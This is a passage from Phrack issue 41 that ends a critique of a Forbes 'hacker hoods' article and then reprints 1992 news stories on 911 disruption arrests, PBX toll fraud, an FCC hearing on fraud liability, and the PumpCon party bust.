  6303.      expert Donn Parker of consultants SRI International: "Such a
  6304.      'salami attack' is definitely possible, especially for an
  6305.      insider" (p. 186).
  6306.  
  6307. Has anybody calculated how many accounts one would have to "skim" a few pennies
  6308. from before obtaining $200,000?  At a dime apiece, that's over 2 million.  If
  6309. I'm figuring correctly, at one minute per account, 60 accounts per minute non-
  6310. stop for 24 hours a day all year, it would take nearly 4 straight years of on-
  6311. line computer work for an out-sider.  According to the story, it took only 3
  6312. months.  At 20 cents an account, that's over a million accounts.
  6313.  
  6314. Although no names or evidence are given, the story quotes Donn Parker of SRI as
  6315. saying that the story is a "definite possibility."  Over the years, there have
  6316. been cases of skimming, but as I remember the various incidents, all have been
  6317. inside jobs and few, if any, involved hackers.  The story is suspiciously
  6318. reminiscent of the infamous "bank cracking" article published in Phrack as a
  6319. spoof several years ago.
  6320.  
  6321. The basis for the claim that "hacker hoods" (former "playground bullies") are
  6322. now dangerous is based on a series of second and third-hand rumors and myths.
  6323. The authors then list from "generally reliable press reports" a half-dozen or
  6324. so non-hacker fraud cases that, in context, would seem to the casual reader to
  6325. be part of the "hacker menace." I counted in the article at least 24 instances
  6326. of half-truths, inaccuracies, distortions, questionable/spurious links, or
  6327. misleading claims that are reminiscent of 80s media hype. For example, the
  6328. article attributes to Phiber Optik counts in the MOD indictment that do not
  6329. include him, misleads on the Len Rose indictment and guilty plea, uses second
  6330. and third hand information as "fact" without checking the reliability, and
  6331. presents facts out of context (such as attributing the Morris Internet worm to
  6332. "hackers).
  6333.  
  6334. Featured as a key "hacker hood" is "Kimble," a German hacker said by some to be
  6335. sufficiently media-hungry and self-serving that he is ostracized by other
  6336. German hackers. His major crime reported in the story is hacking into PBXes.
  6337. While clearly wrong, his "crime" hardly qualifies him for the "hacker
  6338. hood/organized crime" danger that's the focus of the story. Perhaps he is
  6339. engaged in other activities unreported by the authors, but it appears he is
  6340. simply a run-of-the-mill petty rip-off artist. In fact, the authors do not make
  6341. much of his crimes. Instead, they leap to the conclusion that "hackers" do the
  6342. same thing and sell the numbers "increasingly" to criminals without a shred of
  6343. evidence for the leap.  To be sure the reader understands the menace, the
  6344. authors also invoke unsubstantiated images of a hacker/Turkish Mafia connection
  6345. and suggest that during the Gulf war, one hacker was paid "millions" to invade
  6346. a Pentagon computer and retrieve information from a spy satellite (p. 186).
  6347.  
  6348. Criminals use computers for crime. Some criminals may purchase numbers from
  6349. others. But the story paints a broader picture, and equates all computer crime
  6350. with "hacking."  The authors' logic seems to be that if a crime is committed
  6351. with a computer, it's a hacking crime, and therefore computer crime and
  6352. "hackers" are synonymous.  The story ignores the fact that most computer crime
  6353. is an "inside job" and it says nothing about the problem of security and how
  6354. the greatest danger to computer systems is careless users.
  6355.  
  6356. One short paragraph near the end mentions the concerns about civil liberties,
  6357. and the next paragraph mentions that EFF was formed to address these concerns.
  6358. However, nothing in the article articulates the bases for these concerns.
  6359. Instead, the piece promotes the "hacker as demon" mystique quite creatively.
  6360.  
  6361. The use of terms such as "new hoods on the block," "playground bullies," and
  6362. "hacker hoods" suggests that the purpose of the story was to find facts to fit
  6363. a slant.
  6364.  
  6365. In one sense, the authors might be able to claim that some of their "facts"
  6366. were accurate.  For example, the "playground bullies" phrase is attributed to
  6367. Cheshire Catalyst.  "Gee, *we* didn't say it!"  But, they don't identify
  6368. whether it's the original CC or not.  The phrase sounds like a term used in
  6369. recent internecine "hacker group" bickering, and if this was the context, it
  6370. hardly describes any new "hacker culture."  Even so, the use of the phrase
  6371. would be akin to a critic of the Forbes article referring to it as the product
  6372. of "media whores who are now getting paid for doing what they used to do for
  6373. free," and then applying the term "whores" to the authors because, hey, I
  6374. didn't make up the term, somebody else did, and I'm just reporting (and using
  6375. it as my central metaphor) just the way it was told to me.  However, I suspect
  6376. that neither Forbes' author would take kindly to being called a whore because
  6377. of the perception that they prostituted journalistic integrity for the pay-off
  6378. of a sexy story.  And this is what's wrong with the article: The authors take
  6379. rumors and catch-phrases, "merely report" the phrases, but then construct
  6380. premises around the phrases *as if* they were true with little (if any)
  6381. evidence.  They take an unconfirmed "truth" (where are fact checkers when you
  6382. need them) or an unrelated "fact" (such as an example of insider fraud) and
  6383. generalize from a discrete fact to a larger population. The article is an
  6384. excellent bit of creative writing.
  6385.  
  6386.  
  6387.                             Why Does It All Matter?
  6388.  
  6389. Computer crime is serious, costly, and must not be tolerated.  Rip-off is no
  6390. joke.  But, it helps to understand a problem before it can be solved, and lack
  6391. of understanding can lead to policies and laws that are not only ineffective,
  6392. but also a threat to civil liberties.  The public should be accurately informed
  6393. of the dangers of computer crime and how it can be prevented. However, little
  6394. will be served by creating demons and falsely attributing to them the sins of
  6395. others.  It is bad enough that the meaning" of the term "hacker" has been used
  6396. to apply both to both computer delinquents and creative explorers without also
  6397. having the label extended to include all other forms of computer criminals as
  6398. well.
  6399.  
  6400. CPSR, the EFF, CuD, and many, many others have worked, with some success, to
  6401. educate the media about both dangers of computer crime and the dangers of
  6402. inaccurately reporting it and attributing it to "hackers."  Some, perhaps most,
  6403. reporters take their work seriously, let the facts speak to them, and at least
  6404. make a good-faith effort not to fit their "facts" into a narrative that--by one
  6405. authors' indication at least -- seems to have been predetermined.
  6406.  
  6407. Contrary to billing, there was no evidence in the story, other than
  6408. questionable rumor, of "hacker" connection to organized crime.  Yet, this type
  6409. of article has been used by legislators and some law enforcement agents to
  6410. justify a "crackdown" on conventional hackers as if they were the ultimate
  6411. menace to society.  Forbes, with a paid circulation of over 735,000 (compared
  6412. to CuDs unpaid circulation of only 40,000), reaches a significant and
  6413. influential population.  Hysterical stories create hysterical images, and these
  6414. create hysteria-based laws that threaten the rights of law-abiding users.  When
  6415. a problem is defined by irresponsibly produced images and then fed to the
  6416. public, it becomes more difficult to overcome policies and laws that restrict
  6417. rights in cyberspace.
  6418.  
  6419. The issue is not whether "hackers" are or are not portrayed favorably.  Rather,
  6420. the issue is whether images reinforce a witch-hunt mentality that leads to the
  6421. excesses of Operation Sun Devil, the Steve Jackson Games fiasco, or excessive
  6422. sentences for those who are either law-abiding or are set up as scapegoats.
  6423. The danger of the Forbes article is that it contributes to the persecution of
  6424. those who are stigmatized not so much for their acts, but rather for the signs
  6425. they bear.
  6426. _______________________________________________________________________________
  6427.  
  6428.  
  6429.                                 ==Phrack Inc.==
  6430.  
  6431.                   Volume Four, Issue Forty-One, File 13 of 13
  6432.  
  6433.               PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  6434.               PWN                                             PWN
  6435.               PWN              Phrack World News              PWN
  6436.               PWN                                             PWN
  6437.               PWN           Issue 41 / Part 3 of 3            PWN
  6438.               PWN                                             PWN
  6439.               PWN        Compiled by Datastream Cowboy        PWN
  6440.               PWN                                             PWN
  6441.               PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  6442.  
  6443.  
  6444.  Boy, 15, Arrested After 911 Paralyzed By Computer Hacker       October 7, 1992
  6445.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  6446.  by Caroline Mallan (The Toronto Star)(Page A22)
  6447.  
  6448. A 15-year-old boy has been arrested after a hacker pulling computer pranks
  6449. paralyzed Metro's emergency 911 service.
  6450.  
  6451. Police with Metro's major crime unit investigated the origin of countless calls
  6452. placed to the 911 service from mid-July through last month.
  6453.  
  6454. The calls were routed to emergency services in the Etobicoke area, said
  6455. Detective Willie Johnston, who led the investigation.
  6456.  
  6457. Phony medical emergency calls were reported and police, fire and ambulance
  6458. crews were dispatched on false alarms.  On one occasion, the computer hacker
  6459. managed to tie up the entire 911 service in Metro -- making it unavailable for
  6460. true emergencies.
  6461.  
  6462. Police were not sure last night how long the system was shut down for but
  6463. Johnston said the period was considerable.
  6464.  
  6465. Staff Sergeant Mike Sale warned hackers that phony calls can be traced.
  6466.  
  6467. "A criminal abuse of the 911 emergency system will result in a criminal
  6468. investigation and will result in an arrest," Sale said, adding police had only
  6469. been investigating this hacker for a few weeks before they came up with a
  6470. suspect.
  6471.  
  6472. Bell Canada investigators helped police to trace the origin of the calls and
  6473. officers yesterday arrested a teen while he was in his Grade 11 class at a
  6474. North York high school.
  6475.  
  6476. Two computers were seized from the boy's home and will be sent to Ottawa to be
  6477. analyzed.
  6478.  
  6479. Johnston said police are concerned that other hackers may also be able to halt
  6480. the 911 service, since the computer technology used was fairly basic, although
  6481. the process of rerouting the calls from a home to the Etobicoke emergency lines
  6482. was very complex.
  6483.  
  6484. The calls went via computer modem through two separate phone systems in major
  6485. U.S. cities before being sent back to Canada, Johnston explained.
  6486.  
  6487. The suspect, who cannot be named under the Young Offenders Act, is charged with
  6488. theft of telecommunications, 24 counts of mischief and 10 counts of conveying
  6489. false messages.
  6490.  
  6491. He was released from custody and will appear in North York youth court November
  6492. 6, police said.
  6493.  
  6494. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  6495.  
  6496.  Police Say They've Got Hackers' Number                         October 8, 1992
  6497.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  6498.  by John Deverell (The Toronto Star)(Page A8)
  6499.  
  6500.       Hackers, take note.  Metro police and Ma Bell are going to get you.
  6501.  
  6502. A young North York computer freak accused of launching 10 false medical alerts
  6503. to 911 this summer may have learned -- the hard way -- that his telephone
  6504. tricks weren't beating the pros.
  6505.  
  6506. Police arrived with a search warrant at the home of the 15-year-old, arrested
  6507. him and carted away his computer.
  6508.  
  6509. He's charged with 10 counts of conveying false messages, 24 counts of mischief,
  6510. and theft of telecommunications.
  6511.  
  6512. Inspector Bill Holdridge, of 911 emergency services, said the false alarms in
  6513. July and August never posed any technical problem to his switchboard but
  6514. resulted in wild goose chases for the police, fire and ambulance services.
  6515.  
  6516. "Those resources weren't available for real alarms, which could have been a
  6517. serious problem," Holdridge said.
  6518.  
  6519. The 911 service, quartered at 590 Jarvis Street, gets about 7,000 calls a day,
  6520. of which 30% warrant some kind of emergency response.
  6521.  
  6522. Normally, a computerized tracing system takes only seconds to provide the
  6523. address and number of the telephone from which a call originates -- unless the
  6524. point of origin has been somehow disguised.
  6525.  
  6526. Apparently the 911 prankster got into the telephone system illegally and routed
  6527. his calls through several U.S. networks before bringing them back to Toronto.
  6528.  
  6529. Detective Willie Johnston said the boy's parents were stunned when police
  6530. arrived.  "They really didn't have a clue what was going on," said Johnston.
  6531.  
  6532. The false emergencies reported were nowhere near the accused boy's home.
  6533. "Without condoning it, you could understand it if he were sitting around the
  6534. corner watching the flashing lights," said Johnston.  "But they were miles
  6535. away. It defies logic."
  6536.  
  6537. Neither Johnston nor Holdridge would explain how they and Bell security finally
  6538. traced the false alarms. "That might just make other hackers try to figure out
  6539. another way," Holdridge said.
  6540.  
  6541. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  6542.  
  6543.  Hackers Targeted 911 Systems, Police Say                      October 10, 1992
  6544.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  6545.  Taken from United Press International
  6546.  
  6547. Authorities expect to make more arrests after penetrating a loose network of
  6548. computer hackers called the "Legion of Doom" they say tapped into corporate
  6549. phone lines to call 911 systems nationwide with the intent of disrupting
  6550. emergency services.
  6551.  
  6552. Prosecutors from Virginia, New Jersey and Maryland -- in conjunction with
  6553. investigators from two telephone companies -- traced some of the hackers and
  6554. closed in on three homes in two states.
  6555.  
  6556. A 23-year-old Newark, New Jersey man was arrested early on October 9th.  He
  6557. faces several charges, including fraud.  Other arrests are expected in two
  6558. Maryland locations.
  6559.  
  6560. The suspect, known by several aliases and identified by authorities only as
  6561. Maverick, told investigators the group's intent was "to attempt to penetrate
  6562. the 911 computer systems and infect them with viruses to cause havoc," said
  6563. Captain James Bourque of the Chesterfield County police in Virginia.
  6564.  
  6565. The probe is just beginning, according to Bourque.  "Quite honestly, I think
  6566. it's only the tip of the iceberg," he said.
  6567.  
  6568. The hackers first penetrate the phone lines of large companies or pay phones,
  6569. then use those connections to call 911 lines, Bourque said.  The hackers
  6570. usually make conference calls to other 911 services in other cities, tying up
  6571. communications in several locations simultaneously.
  6572.  
  6573. "One time we were linked up with Toronto and Los Angeles jurisdictions,"
  6574. Bourque said.  "And none of us could disconnect."
  6575.  
  6576. Sometimes as many five hackers would be on the line and would make false calls
  6577. for help.  Communications officers, unable to stop the calls, would have to
  6578. listen, then try to persuade the officers in other locales "that the call
  6579. wasn't real," Bourque said.
  6580.  
  6581. "Obviously, there's a real potential for disastrous consequences," he said.
  6582.  
  6583. One phone bill charged to a company in Minnesota indicated the scope of the
  6584. problem.  The company discovered in a 30-day period that it had been charged
  6585. with more than $100,000 in phone calls generated by the hackers, according to
  6586. Bourque.
  6587.  
  6588. "I'm sure there are a multitude of other jurisdictions across the country
  6589. having the same problems," Bourque said.
  6590.  
  6591. People identifying themselves as members of the "Legion of Doom" -- which also
  6592. is the name of a pro wresting team -- have called a Richmond, Virginia
  6593. television station and ABC in New York in an attempt to get publicity, Bourque
  6594. said.
  6595.  
  6596. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  6597.  
  6598.  More On 911 "Legion Of Doom" Hacking Case                     October 20, 1992
  6599.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  6600.  by Barbara E. McMullen & John F. McMullen (Newsbytes)
  6601.  
  6602. NEW YORK CITY -- In a discussion with Newsbytes, Sgt. Kurt Leonard of the
  6603. Chesterfield County, Virginia Police Department has disclosed further
  6604. information concerning the on-going investigation of alleged 911 disruption
  6605. throughout the eastern seaboard of the United States by individuals purporting
  6606. to be members of the hacker group "The Legion of Doom" (LOD).
  6607.  
  6608. Leonard identified the individual arrested in Newark, New Jersey, previously
  6609. referred to only as "Maverick," as Scott Maverick, 23.  Maverick has been
  6610. charged with terroristic threats, obstruction of a government function, and
  6611. illegal access to a computer.  He is presently out on bail.
  6612.  
  6613. Leonard said that David Pluchino, 22, was charged to the same counts as
  6614. Maverick and an additional count of the possession of burglary tools.  Leonard
  6615. said that Pluchino, the subject of a 1990 Secret Service "search and seizure"
  6616. action under the still on-going "Operation SunDevil" investigation," possessed
  6617. information linking him with members of the Legion of Doom.
  6618.  
  6619. The Legion of Doom connection has become the subject of controversy within the
  6620. online community.  Although Maverick has been quoted as saying that he is a
  6621. member of the group and that the group's intent was "to attempt to penetrate
  6622. the 911 computer systems and inflect them with viruses to cause havoc," members
  6623. of the group have disavowed any connection with those arrested.
  6624.  
  6625. "Lex Luthor," one of the original members of the group, told Newsbytes when the
  6626. initial report of the arrests became public: "As far as I am concerned the LOD
  6627. has been dead for a couple of years, never to be revived.  Maverick was never
  6628. in LOD.  There have been 2 lists of members (one in Phrack and another in the
  6629. LOD tj) and those lists are the final word on membership."
  6630.  
  6631. He added, "We obviously cannot prevent copy-cats from saying they are in LOD.
  6632. When there was an LOD, our goals were to explore and leave systems as we found
  6633. them.  The goals were to expose security flaws so they could be fixed before
  6634. REAL criminals and vandals such as this Maverick character could do damage.  If
  6635. this Maverick character did indeed disrupt E911 service he should be not only
  6636. be charged with computer trespassing but also attempted murder.  911 is serious
  6637. business."
  6638.  
  6639. Lex Luthor's comments, made before the names of the arrested were released,
  6640. were echoed by Chris Goggans, aka "Erik Bloodaxe," and Mark Abene, aka "Phiber
  6641. Optik," both ex-LOD members, and by Craig Neidorf who chronicled the membership
  6642. of LOD in his electronic publication "Phrack."
  6643.  
  6644. When the names of the arrested became public, Newsbytes again contacted Lex
  6645. Luthor to see if the names were familiar.  Luthor replied: "Can't add anything,
  6646. I never heard of them."
  6647.  
  6648. Phiber Optik, a New York resident, told Newsbytes that he remembered Pluchino
  6649. as a person that ran a computer "chat" system called "Interchat" based in New
  6650. Jersey.  "They never were LOD members and Pluchino was not known as a computer
  6651. hacker.  It sounds as though they were LOD wanabees who are now, by going to
  6652. jail, going to get the attention they desire," he said.
  6653.  
  6654. A law enforcement official, familiar with the SunDevil investigation of
  6655. Pluchino, agreed with Phiber, saying, "There was no indication of any
  6656. connection with the Legion of Doom."  The official, speaking under the
  6657. condition of anonymity, also told Newsbytes that the SunDevil investigation of
  6658. Pluchino is still proceeding and, as such, no comment can be made.
  6659.  
  6660. Leonard also told Newsbytes that the investigation has been a joint effort of
  6661. New Jersey, Maryland, and Virginia police departments and said that, in
  6662. conjunction with the October 9th 2:00 AM arrests of Pluchino and Maverick, a
  6663. simultaneous "search and seizure" operation was carried out at the Hanover,
  6664. Maryland home of Zohar Shif, aka "Zeke," a 23 year-old who had also been the
  6665. subject of a SunDevil search and seizure.
  6666.  
  6667. Leonard also said that, in addition to computers taken from Pluchino, material
  6668. was found "establishing a link to the Legion of Doom."  Told of the comments by
  6669. LOD members that the group did not exist anymore, Leonard said "While the
  6670. original members may have gone on to other things, these people say they are
  6671. the LOD and some of them have direct connection to LOD members and have LOD
  6672. materials."
  6673.  
  6674. Asked by Newsbytes to comment on Leonard's comments, Phiber Optik said "The
  6675. material he's referring to is probably text files that have been floating
  6676. around BBS's for years, Just because someone has downloaded the files certainly
  6677. doesn't mean that they are or ever were connected with LOD."
  6678. _______________________________________________________________________________
  6679.  
  6680.  Complaints On Toll Fraud Aired at FCC En Banc Hearing         October 13, 1992
  6681.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  6682.  by Art Brodsky (Communications Daily)(Page 1)
  6683.  
  6684. Customers of PBX manufacturers told the Federal Communications Commission (FCC)
  6685. they shouldn't be liable for toll fraud losses incurred because vendors never
  6686. told them of capabilities of their equipment that left companies open to
  6687. electronic theft.  Their case was buttressed by one of country's leading toll-
  6688. fraud investigators, who told day-long en banc hearing that customers shouldn't
  6689. have to pay if they're victimized.  Donald Delaney of the New York State Police
  6690. said toll fraud "is the only crime I know where the victims are held liable."
  6691. Toll fraud losses have been estimated to run into billions of dollars.
  6692.  
  6693. Commission's look at toll fraud came in context of what FCC can do to prevent
  6694. or lessen problem.  Comr. Marshall said Commission's job would be to apportion
  6695. liability between vendors and customers.  Comr. Duggan, who has been leader on
  6696. issue at Commission, said toll fraud was "hidden degenerative disease on the
  6697. body of business."  He focused on insurance solution to problem, along with
  6698. sharing of liability.  There are cases pending at FCC filed by AT&T customers
  6699. that deal with sharing of liability, and whether common carriers are protected
  6700. by tariffs from paying customers for losses.  Witnesses told Commission it was
  6701. hard to find any law enforcement agency interested in problem, from local
  6702. police to FBI, in addition to difficulties with vendors.  U.S. Secret Service
  6703. has statutory responsibility over toll fraud, said attorney William Cook, who
  6704. testified in afternoon session.  There was general agreement that more customer
  6705. education was needed to prevent fraud, policy endorsed by Northern Telecom,
  6706. which has active customer education program.
  6707.  
  6708. AT&T came in for particular criticism in morning session as users said company
  6709. was insensitive to toll fraud problems.  Thomas Mara, executive vice-president
  6710. Leucadia National Corp., whose company suffered $300,000 in toll fraud, said he
  6711. "had a hell of a time getting anybody at AT&T to pay attention" to problems his
  6712. company was encountering.  Mara said his company saw level of 800 calls rise to
  6713. 10,448 from 100.  He said AT&T was supposed to notify users if there was any
  6714. "dramatic increase in volume, yet we were not notified of a thousandfold
  6715. increase in 800 number usage nor were we informed of an increase from a few
  6716. hours a month in international calls to thousands of hours by AT&T, only after
  6717. receiving our bills."  Investigation found that 800 number connecting Rolm
  6718. switch to company's voice mail was hackers' entry method, Mara said.
  6719.  
  6720. Clearly angry with AT&T, Mara said he has "a feeling they use it as a profit
  6721. center."  Lawrence Gessini, telecommunications director for Agway Corp. of
  6722. Syracuse, agreed, saying: "Toll fraud should not become a rationale for higher
  6723. profits for carriers."  He told FCC that new programs introduced by long
  6724. distance carriers won't solve problem because of constraints, limitations and
  6725. expense.
  6726.  
  6727. Speaking for International Communications Association (ICA) user group, Gessini
  6728. said problems occur because new technologies allow more types of fraud and
  6729. because "old tariff concepts" that limit common carrier liability "distort
  6730. market incentives."  Vendors, he said, are "generally lackadaisical and are
  6731. slow to correct even known problems in their hardware, firmware and software,"
  6732. and give low priority to complaints.  ICA advocated 5 principles including FCC
  6733. inquiry into fraud, creation of advisory committee and willingness of
  6734. Commission to protect users.
  6735.  
  6736. Geoffrey Williams, industry consultant and telecommunications manager for
  6737. IOMEGA Corp., said AT&T has been "most notable" for asking for restitution,
  6738. while Sprint and MCI are more lenient.  MCI doesn't charge users for first
  6739. hacking incident, he said, but after that users are on their own.
  6740.  
  6741. AT&T defended itself in afternoon session, when International Collections Dist.
  6742. Manager Peter Coulter rejected users' accusations, saying company had increased
  6743. customer education program "dramatically" since last year.  He insisted that
  6744. AT&T is "very concerned" by toll fraud: "Contrary to what some people want to
  6745. believe, no long distance carrier is making a profit off toll fraud."  He said
  6746. AT&T had 6,000 customers attend equipment security seminars in 1991, but that
  6747. number had been exceeded in first 6 months of 1992.  He said results of
  6748. increased education program were "only preliminary" but his group was receiving
  6749. "a lot more accommodations" than complaints from customers.
  6750.  
  6751. Coulter, while never admitting that company should shoulder any financial
  6752. liability, admitted that "things are different now" as to how AT&T approaches
  6753. toll fraud problem.  He said that within AT&T it used to be hardware division
  6754. vs. service division.  "The hardware guys said it was a service problem, the
  6755. service guys said it was the hardware's fault," Coulter said.  But now both
  6756. divisions are "working together on the problem . . . we're talking to each
  6757. other."
  6758.  
  6759. Delaney of N.Y. state police gave the FCC a picture of the toll fraud situation
  6760. dominated by as few as 15 practitioners, most of whom gain illegal entry to
  6761. telephone systems simply by dialing numbers for hours on end.  Those so-called
  6762. "finger hackers," rather than computer hackers, are responsible for 90% of
  6763. fraud, he said, telling Commission that equipment vendors should be held
  6764. accountable for fraud.  Most fraudulent calls go to Pakistan, Colombia and
  6765. Dominican Republic, he said.
  6766.  
  6767. Delaney pointed out practical objection to further vendor education problem,
  6768. telling commissioners that for vendor to engage in education would also be to
  6769. admit there could be problem with equipment security, something sales people
  6770. don't want to do.  He said some customers had been sold systems and didn't know
  6771. they had capability for remote access -- means used by hackers to gain entry.
  6772. _______________________________________________________________________________
  6773.  
  6774.  Hanging Up On Hackers                                         October 12, 1992
  6775.  ~~~~~~~~~~~~~~~~~~~~~
  6776.  by Miriam Leuchter (Crain's New York Business)(Page 21)
  6777.  
  6778.             "Thieves tap phone systems, but business cuts the line."
  6779.  
  6780. Ron Hanley suspected a technical glitch when his company's telephone bill
  6781. listed an unusually large number of calls lasting four seconds to its 800-
  6782. number from New York City.  But the executive at Dataproducts New England in
  6783. Wallingford, Connecticut didn't lose sleep over the problem -- until he got a
  6784. call two months later from the security department at American Telephone &
  6785. Telegraph Co.
  6786.  
  6787. Dataproducts had been hacked.  Two days after that, Mr. Hanley got a bill
  6788. confirming the bad news:  In one 24-hour period, street-corner phone users in
  6789. New York had made some 2,000 calls to the Caribbean on the company's line,
  6790. ringing up about $50,000 in tolls.
  6791.  
  6792. Dataproducts is not alone.  Estimates of the cost of telecommunications fraud
  6793. in the United States each year run from $1 billion to as much as $9 billion.
  6794. According to John J. Haugh, editor of Toll Fraud and Telabuse and chairman of a
  6795. Portland, Oregon consulting firm, losses reached $4 billion in 1991 and are
  6796. expected to climb 30% in 1992.
  6797.  
  6798. Some 35,000 businesses and other users -- such as foundations and government
  6799. agencies -- will be hit this year.  In the first six months, Mr. Haugh says,
  6800. more than 900 New York City companies were victims of telephone-related fraud.
  6801.  
  6802. "If you have a PBX system or calling cards or voice mail, you are vulnerable,
  6803. exceedingly vulnerable," says Peggy Snyder, executive director of the
  6804. Communications Fraud Control Association, a national information clearinghouse
  6805. based in Washington.  "As technology gets more user-friendly, the opportunity
  6806. to commit a crime is much greater."
  6807.  
  6808. Armed with computers, modems and sometimes automatic dialers or random-number
  6809. generating software, high-technology thieves can use your telephone system as
  6810. if it is their own -- without having to pay the tolls.  The series of very
  6811. short calls Mr. Hanley spotted on one phone bill should have tipped off his
  6812. 800-number service provider -- which he had alerted when he spotted the pattern
  6813. -- that hackers were trying to break into his system.
  6814.  
  6815. Who are these hackers -- a term used to describe someone who uses a telephone
  6816. or computer to obtain unauthorized access to other computers?  Many are
  6817. teenagers or young adults out to demonstrate their computer skills and make
  6818. some mischief.  Five young New Yorkers are awaiting trial in federal court on
  6819. unauthorized access and interception of electronic communications charges in
  6820. one widely publicized telephone fraud case.
  6821.  
  6822. A much smaller proportion are more serious criminals: drug dealers, money
  6823. launderers and the like, who don't want their calls traced.  In one case, Ms.
  6824. Snyder cites a prostitution ring that employed unused voice mail extensions at
  6825. one company to leave and receive messages from clients.
  6826.  
  6827. Many hackers have connections to call-sell operators who set up shop at phone
  6828. booths, primarily in poorer immigrant neighborhoods in cities from New York to
  6829. Los Angeles.  For a flat fee -- the going rate is $10, according to one source
  6830. -- callers can phone anywhere in the world and talk as long as they want.  The
  6831. hawker at the phone booth pockets the cash and someone else pays the bill.
  6832.  
  6833. Perhaps 15 to 20 so-called finger hackers (who crack authorization codes by
  6834. hand dialing) distribute information to call-sell operators at thousands of
  6835. locations in New York.  According to Don Delaney, a senior investigator for the
  6836. New York State Police, the bulk of such calls from phone booths in the city go
  6837. to the Dominican Republic, Pakistan and Colombia.
  6838.  
  6839. Hackers may use more than technical skill to gain the access they want.
  6840. Sometimes they practice "social engineering" -- talking a company's employees
  6841. into divulging information about the telephone system.  Or they manage a
  6842. credible imitation of an employee, pretending to be an employee.
  6843.  
  6844. In one of the latest schemes, a fraudulent caller gets into a company's system
  6845. and asks the switchboard operator to connect him with an outside operator.  The
  6846. switchboard assumes the caller is an employee who wants to make a personal call
  6847. on his own calling card.
  6848.  
  6849. Instead, he uses a stolen or hacked calling card number.  The fraud goes
  6850. undetected until the card's owner reports the unauthorized use to his long-
  6851. distance carrier.  If the cardholder refuses to pay the charges, the phone
  6852. company traces the calls to the business from which they were placed.  Because
  6853. it looks as if the call came from the company, it is often held liable for the
  6854. charge.
  6855.  
  6856. In another new twist, a hacker gains access to an unused voice mail extension
  6857. at a company, or takes over someone's line at night or while the regular user
  6858. is on vacation.  He changes the recorded announcement to say, "Operator, this
  6859. number will accept all collect and third-party calls."  Then the hacker -- or
  6860. anyone else -- can telephone anywhere in the world and bill the charges to that
  6861. extension.
  6862.  
  6863. Sometimes the fraud is much more organized and sophisticated, however.  Robert
  6864. Rasor, special agent in charge of the financial crime division of the U.S.
  6865. Secret Service, gives an example of a three-way calling scheme in which hackers
  6866. tap into a phone system in the United States and set up a separate network that
  6867. allows people in other countries to call each other directly.  "The
  6868. Palestinians are one of the more prominent groups" running these sorts of
  6869. fraud, he says.
  6870.  
  6871. But no matter who the end user is, businesses like Dataproducts end up footing
  6872. the bill.  Personal users are generally not held liable for the unauthorized
  6873. use of their calling card numbers.  Under current regulation, a business is
  6874. responsible for all calls that go through its equipment, whether or not those
  6875. calls originated at the company.
  6876.  
  6877. This hard fact rankles Mr. Hanley.  "It's totally frustrating and almost
  6878. unbelievable that you're responsible for this bill.  It's really frightening
  6879. for any company."
  6880.  
  6881. Dataproducts's liability was relatively small compared with the $168,000
  6882. average Mr. Haugh calculated in a study he made last year.  It could have been
  6883. worse yet.
  6884.  
  6885. "The largest case I've ever seen in the metropolitan region was a company that
  6886. lost almost $1 million within 30 days," says Alan Brill, managing director of
  6887. the New York corporate security firm Kroll Associates Inc.
  6888.  
  6889. "It was a double whammy, because even though their long-distance carrier saw a
  6890. suspicious pattern of calls and blocked access to those area codes, the company
  6891. didn't know its PBX system would automatically switch to another carrier if
  6892. calls couldn't go through," Mr. Brill says.  "So the company got a bill for
  6893. $300,000 from its primary carrier and a $600,000 bill from the secondary
  6894. carrier."
  6895.  
  6896. Both AT&T and Sprint Corp. offer service plans that limit liability to $25,000
  6897. per fraud episode for their business customers.  Mr. Brill advises companies to
  6898. evaluate the cost-effectiveness of these plans in great detail, because in
  6899. order to be eligible for coverage companies must take certain steps to minimize
  6900. their risk.  "If you reduce your risk significantly, you may not need the
  6901. coverage," he says.
  6902.  
  6903. The plans require customers to respond to a problem in as little as two hours
  6904. after notification of unauthorized calls.  Doing so will stem your losses in
  6905. any event.  "You also have to think about how you're staffed," adds Mr. Brill.
  6906. "Can you act that fast?"
  6907. _______________________________________________________________________________
  6908.  
  6909.  PWN Quicknotes
  6910.  ~~~~~~~~~~~~~~
  6911.  
  6912. 1.  HACKER PARTY BUSTED (by Robert Burg, Gannett, 11/3/92) -- "PumpCon Popped!"
  6913.     -- WHITE PLAINS, New York -- Police say a Halloween party they broke up
  6914.     Sunday (11/1/92) was more than just a rowdy party - it also was a computer
  6915.     hacker party.
  6916.  
  6917.     Three men were charged with unauthorized use of a computer and attempting
  6918.     computer trespass.  A fourth man was arrested on an outstanding warrant
  6919.     involving violating probation on a charge of computer fraud in Arizona,
  6920.     Greenburgh Detective Lt. Cornelius Sullivan said.
  6921.  
  6922.     Security officers at the Westchester Marriott contacted police after
  6923.     noticing an unusual number of people entering and leaving one room.  Police
  6924.     said that when they arrived, there were 21 people inside and computers
  6925.     hooked up to telephone lines.  Police said they also found telephone credit
  6926.     cards that did not belong to any of the people present.
  6927.  
  6928.     The three charged with unauthorized use of a computer and attempted
  6929.     computer trespass were Randy Sigman, 40, of Newington, Connecticut; Ronald
  6930.     G. Pinz, 21, of Wallingford, Connecticut and Byron Woodard, 18, of
  6931.     Woonsocket, Rhode Island.
  6932.  
  6933.     They were being held at the Westchester County Jail in Valhalla pending
  6934.     arraignment.
  6935.  
  6936.     The man charged on the warrant, Jason Brittain, 22, of Tucson, Arizona, was
  6937.     being held without bail pending arraignment.
  6938.  
  6939.     The Westchester County District Attorney frauds division seized the
  6940.     computer hardware, software, and other electrical equipment.
  6941.  
  6942.     Sullivan said the party-goers heard about the party through computer
  6943.     bulletin boards.
  6944.  
  6945. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  6946.  
